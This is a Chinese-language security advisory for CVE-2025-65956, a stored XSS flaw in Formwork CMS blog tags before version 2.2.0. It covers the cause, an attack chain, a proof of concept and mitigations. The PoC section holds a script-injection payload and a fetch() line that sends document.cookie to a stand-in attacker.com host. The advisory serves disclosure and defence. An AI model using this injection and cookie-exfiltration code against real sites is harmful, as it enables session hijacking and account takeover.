CVE-2025-65956 Formwork CMS博客标签存储型XSS漏洞

漏洞信息

漏洞编号

CVE-2025-65956

漏洞类型

存储型跨站脚本攻击(XSS)

CVSS评分

6.5 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

需要交互 (UI:R)

影响产品

Formwork CMS

漏洞概述

Formwork是一款基于平面文件的内容管理系统(CMS)。该系统在2.2.0版本之前存在一个严重的安全漏洞：由于博客标签字段未对用户输入进行充分的过滤和转义，攻击者可以在标签字段中注入恶意JavaScript代码，形成存储型跨站脚本攻击(Stored XSS)。攻击者只需要拥有该CMS的有效用户凭据，即可利用此漏洞。一旦恶意脚本被存储，任何访问或编辑受影响的博客文章的用户的浏览器都会自动执行攻击者植入的代码。该漏洞具有持久性特点，影响范围涵盖所有使用受影响版本Formwork CMS的用户。由于攻击发生在特权管理环境中，攻击者可能通过XSS窃取管理员会话Cookie、劫持管理员账号、篡改网站内容，甚至进一步进行横向移动攻击。官方已在2.2.0版本中修复此问题，建议所有用户立即升级。

技术细节

该漏洞的根本原因在于Formwork CMS的博客标签输入处理逻辑缺少输入验证和输出编码机制。当用户创建或编辑博客文章时，系统直接将标签字段的用户输入存储到数据库中，而在后续页面渲染时未对标签内容进行HTML实体编码。具体技术细节如下：1) 输入层面：系统接收用户输入的博客标签字符串后，未进行白名单过滤或XSS特殊字符转义，直接存储到数据文件或数据库中；2) 存储层面：恶意Payload如<script>alert(document.cookie)</script>被原样保存；3) 输出层面：当其他用户访问包含该标签的博客页面时，系统从存储中读取标签数据并直接嵌入HTML响应，未进行任何编码处理；4) 执行层面：用户浏览器将恶意标签内容解析为可执行脚本，导致JavaScript代码在受害者浏览器上下文中执行。攻击者可利用此漏洞窃取用户会话令牌、绕过CSRF防护、执行任意UI操作等。修复方案需在输入阶段进行严格过滤，并在输出阶段对所有不可信数据进行HTML实体编码。

攻击链分析

STEP 1

侦察阶段

攻击者识别目标网站使用的Formwork CMS版本，确认版本号小于2.2.0以确定漏洞存在

STEP 2

初始访问

攻击者通过钓鱼、弱口令或其他方式获取Formwork CMS的有效用户凭据

STEP 3

漏洞利用-注入

攻击者登录CMS后台，创建或编辑博客文章，在标签字段中注入恶意JavaScript代码如<script>alert(document.cookie)</script>

STEP 4

持久化

恶意Payload随博客文章数据一同被存储到系统数据库/文件中，形成持久化攻击点

STEP 5

触发阶段

受害者(管理员或其他用户)访问或编辑包含恶意标签的博客文章时，浏览器解析并执行注入的脚本

STEP 6

攻击成功

攻击者通过XSS成功窃取受害者Cookie、会话令牌，或在受害者上下文中执行任意操作

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

// CVE-2025-65956 PoC - Formwork CMS Stored XSS in Blog Tags
// Prerequisites: Valid Formwork CMS user credentials

// Step 1: Create a blog post with malicious tag
const payload = '<script>console.log(document.cookie)</script>';

// Example HTTP request to create blog post with XSS payload in tag field
const createPostRequest = {
  method: 'POST',
  url: 'https://target-site.com/formwork/api/posts',
  headers: {
    'Content-Type': 'application/json',
    'Authorization': 'Bearer <session-token>'
  },
  body: JSON.stringify({
    title: 'Test Blog Post',
    tags: [payload],
    content: 'This is test content'
  })
};

// Step 2: When admin views the post, XSS executes
// The script will exfiltrate cookies to attacker-controlled server
const exfilScript = `<script>
  fetch('https://attacker.com/steal?c=' + btoa(document.cookie));
</script>`;

// Attack flow:
// 1. Attacker with valid credentials creates/edits blog post
// 2. Inserts XSS payload in tags field
// 3. Payload is stored without sanitization
// 4. Any user viewing/editing the post triggers the XSS
// 5. Attacker steals session cookies or performs actions as victim

影响范围

Formwork CMS < 2.2.0

防御指南

临时缓解措施

在无法立即升级的情况下，可采取以下临时缓解措施：1) 限制博客标签字段的输入长度和允许的字符类型；2) 在Web应用防火墙(WAF)层面配置XSS过滤规则；3) 临时禁用博客功能或限制只有受信任的管理员才能创建博客文章；4) 加强对CMS后台登录的二次验证机制；5) 监控异常的管理员会话活动。但这些措施仅为临时方案，最根本的修复仍是升级到官方发布的安全版本2.2.0。